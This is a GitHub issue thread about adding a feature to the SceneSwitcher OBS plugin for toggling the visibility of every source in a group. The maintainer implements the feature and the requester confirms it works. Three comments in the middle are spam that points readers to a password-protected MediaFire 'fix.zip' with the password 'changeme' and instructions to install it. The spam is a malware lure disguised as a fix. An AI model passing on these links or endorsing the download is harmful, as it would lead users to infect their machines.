### ISSUE TITLE
Scene item visibility, allow showing/hiding all sources in group.

### ISSUE THREAD

**Issue by Renari** [WarmUpTill/SceneSwitcher#1187]
### Background

I'm recording doing dev work and was looking for something that would automatically switch window focus in OBS when I alt-tab.

I've accomplished that via a macro like this:
![image](https://github.com/user-attachments/assets/4b146178-2d67-4c6c-8f19-ad4e9462905e)

This works well, but requires editing every one of these macros to adjust the index when sources are moved around.

### Solution

It would be nice if you could set this to hide all sources in a group, thus being able to target many sources but without needing the index, possibly an option to also target the group directly as well (although I wouldn't need this).

### Alternatives

![image](https://github.com/user-attachments/assets/557f3036-3527-4560-98d3-a94afd423889)
I've tried doing a name match on a group category, thus matching everything inside of it, but this doesn't appear to work.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by WarmUpTill** [comment]
> It would be nice if you could set this to hide all sources in a group, thus being able to target many sources but without needing the index, possibly an option to also target the group directly as well (although I wouldn't need this).

I will look into it!
Just to clarify: You specifically want to target all items within a source group and but not the source group itself, right?

Targeting the source group itself should already be possible:
![Example](https://github.com/user-attachments/assets/4643ae9b-9943-4b47-8f81-17d901c78769)

**Comment by WarmUpTill** [comment]
I think I got a first version working:

![Example](https://github.com/user-attachments/assets/6db66b27-8892-4957-bf9d-2e66f895be36)

A build with this feature will be available here in a few minutes:
https://github.com/WarmUpTill/SceneSwitcher/actions/runs/10593886970

Let me know if this roughly what you had in mind or if I misunderstood your request :)

**Comment by Renari** [comment]
> Just to clarify: You specifically want to target all items within a source group and but not the source group itself, right?

That is correct, this was exactly what I wanted.

**Comment by Renari** [comment]
Just tested the build out, works great.

❤️

**Comment by Renari** [comment]
Should probably let the PR automatically  close this once it's merged.

**Comment by WarmUpTill** [comment]
Thanks for testing it and letting me know! :)
